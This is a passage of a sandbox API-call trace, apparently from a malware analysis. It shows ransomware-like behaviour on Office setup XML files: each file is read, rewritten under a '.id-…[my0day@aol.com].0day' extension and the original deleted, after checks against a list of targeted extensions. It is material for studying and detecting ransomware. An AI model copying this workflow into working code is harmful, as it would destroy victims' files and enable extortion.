[0040.234] lstrlenW (lpString=".1cd") returned 4 [0040.234] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0040.234] lstrlenW (lpString=".jpg") returned 4 [0040.234] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.234] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.234] lstrlenW (lpString="SETUP.XML") returned 9 [0040.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.234] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=31094) returned 1 [0040.234] CloseHandle (hObject=0x204) returned 1 [0040.235] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml")) returned 0x20 [0040.235] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.235] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.235] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.235] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.235] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0040.535] GetLastError () returned 0x0 [0040.535] ReadFile (in: hFile=0x204, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x7976, lpOverlapped=0x0) returned 1 [0040.559] WriteFile (in: hFile=0x200, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x7980, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x7980, lpOverlapped=0x0) returned 1 [0040.560] ReadFile (in: hFile=0x204, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.560] WriteFile (in: hFile=0x200, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.560] SetEndOfFile (hFile=0x200) returned 1 [0040.561] CloseHandle (hObject=0x200) returned 1 [0040.561] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.562] SetEndOfFile (hFile=0x204) returned 1 [0040.562] CloseHandle (hObject=0x204) returned 1 [0040.562] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.563] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml")) returned 1 [0040.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.563] lstrlenW (lpString=".doc") returned 4 [0040.563] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString=".docx") returned 5 [0040.563] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.563] lstrlenW (lpString=".pdf") returned 4 [0040.563] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString=".xls") returned 4 [0040.563] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString=".xlsx") returned 5 [0040.563] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.563] lstrlenW (lpString=".ppt") returned 4 [0040.563] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.563] lstrlenW (lpString=".zip") returned 4 [0040.563] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.563] lstrlenW (lpString=".rar") returned 4 [0040.563] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString=".bz2") returned 4 [0040.563] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.563] lstrlenW (lpString=".7z") returned 3 [0040.563] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.564] lstrlenW (lpString=".dbf") returned 4 [0040.564] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.564] lstrlenW (lpString=".1cd") returned 4 [0040.564] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.564] lstrlenW (lpString=".jpg") returned 4 [0040.564] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.564] lstrlenW (lpString=".doc") returned 4 [0040.564] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString=".docx") returned 5 [0040.564] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.564] lstrlenW (lpString=".pdf") returned 4 [0040.564] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString=".xls") returned 4 [0040.564] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString=".xlsx") returned 5 [0040.564] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.564] lstrlenW (lpString=".ppt") returned 4 [0040.564] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.564] lstrlenW (lpString=".zip") returned 4 [0040.564] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.564] lstrlenW (lpString=".rar") returned 4 [0040.564] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString=".bz2") returned 4 [0040.564] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.564] lstrlenW (lpString=".7z") returned 3 [0040.564] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.564] lstrlenW (lpString=".dbf") returned 4 [0040.565] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.565] lstrlenW (lpString=".1cd") returned 4 [0040.565] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 98 [0040.565] lstrlenW (lpString=".jpg") returned 4 [0040.565] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.565] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.565] lstrlenW (lpString="VisioMUI.XML") returned 12 [0040.565] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0040.643] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=9503) returned 1 [0040.644] CloseHandle (hObject=0x1f4) returned 1 [0040.644] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml")) returned 0x20 [0040.644] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0040.644] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.644] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.646] GetLastError () returned 0x0 [0040.646] ReadFile (in: hFile=0x1f4, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x251f, lpOverlapped=0x0) returned 1 [0040.647] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x2520, lpOverlapped=0x0) returned 1 [0040.648] ReadFile (in: hFile=0x1f4, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.648] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0040.648] SetEndOfFile (hFile=0x1c4) returned 1 [0040.648] CloseHandle (hObject=0x1c4) returned 1 [0040.649] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.649] SetEndOfFile (hFile=0x1f4) returned 1 [0040.650] CloseHandle (hObject=0x1f4) returned 1 [0040.650] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.650] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml")) returned 1 [0040.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.651] lstrlenW (lpString=".doc") returned 4 [0040.651] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.651] lstrlenW (lpString=".docx") returned 5 [0040.651] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.651] lstrlenW (lpString=".pdf") returned 4 [0040.651] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.651] lstrlenW (lpString=".xls") returned 4 [0040.651] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.651] lstrlenW (lpString=".xlsx") returned 5 [0040.651] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.651] lstrlenW (lpString=".ppt") returned 4 [0040.651] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.651] lstrlenW (lpString=".zip") returned 4 [0040.651] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.651] lstrlenW (lpString=".rar") returned 4 [0040.651] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.651] lstrlenW (lpString=".bz2") returned 4 [0040.651] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.651] lstrlenW (lpString=".7z") returned 3 [0040.651] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.651] lstrlenW (lpString=".dbf") returned 4 [0040.651] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.651] lstrlenW (lpString=".1cd") returned 4 [0040.651] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.651] lstrlenW (lpString=".jpg") returned 4 [0040.651] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.652] lstrlenW (lpString=".doc") returned 4 [0040.652] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.652] lstrlenW (lpString=".docx") returned 5 [0040.652] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.652] lstrlenW (lpString=".pdf") returned 4 [0040.652] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.652] lstrlenW (lpString=".xls") returned 4 [0040.652] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.652] lstrlenW (lpString=".xlsx") returned 5 [0040.652] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.652] lstrlenW (lpString=".ppt") returned 4 [0040.652] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.652] lstrlenW (lpString=".zip") returned 4 [0040.652] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.652] lstrlenW (lpString=".rar") returned 4 [0040.652] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.652] lstrlenW (lpString=".bz2") returned 4 [0040.652] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.652] lstrlenW (lpString=".7z") returned 3 [0040.652] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.652] lstrlenW (lpString=".dbf") returned 4 [0040.653] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.653] lstrlenW (lpString=".1cd") returned 4 [0040.653] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0040.653] lstrlenW (lpString=".jpg") returned 4 [0040.653] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.653] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.653] lstrlenW (lpString="WordMUI.XML") returned 11 [0040.653] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0041.265] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1800) returned 1 [0041.265] CloseHandle (hObject=0x200) returned 1 [0041.271] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml")) returned 0x20 [0041.271] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.271] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0041.271] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.271] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.271] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.600] GetLastError () returned 0x0 [0041.600] ReadFile (in: hFile=0x200, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x708, lpOverlapped=0x0) returned 1 [0041.604] WriteFile (in: hFile=0x208, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x710, lpOverlapped=0x0) returned 1 [0041.605] ReadFile (in: hFile=0x200, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.605] WriteFile (in: hFile=0x208, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0041.605] SetEndOfFile (hFile=0x208) returned 1 [0041.605] CloseHandle (hObject=0x208) returned 1 [0041.606] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.606] SetEndOfFile (hFile=0x200) returned 1 [0041.607] CloseHandle (hObject=0x200) returned 1 [0041.607] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0041.607] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml")) returned 1 [0041.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.607] lstrlenW (lpString=".doc") returned 4 [0041.607] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.607] lstrlenW (lpString=".docx") returned 5 [0041.607] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.607] lstrlenW (lpString=".pdf") returned 4 [0041.607] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.607] lstrlenW (lpString=".xls") returned 4 [0041.607] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.608] lstrlenW (lpString=".xlsx") returned 5 [0041.608] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.608] lstrlenW (lpString=".ppt") returned 4 [0041.608] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.608] lstrlenW (lpString=".zip") returned 4 [0041.608] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.608] lstrlenW (lpString=".rar") returned 4 [0041.608] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.608] lstrlenW (lpString=".bz2") returned 4 [0041.608] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.608] lstrlenW (lpString=".7z") returned 3 [0041.608] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.608] lstrlenW (lpString=".dbf") returned 4 [0041.608] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.608] lstrlenW (lpString=".1cd") returned 4 [0041.608] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.608] lstrlenW (lpString=".jpg") returned 4 [0041.608] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102 [0041.608] lstrlenW (lpString=".doc") returned 4 [0041.608] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.608] lstrlenW (lpString=".docx") returned 5 [0041.608] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.608] lstrlenW (lpString=".pdf") returned 4 [0041.608] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.608] lstrlenW (lpString=".xls") returned 4 [0041.608] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.609] lstrlenW (lpString=".xlsx") returned 5 [0041.609] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.609] lstrlenW (lpString=".ppt") returned 4 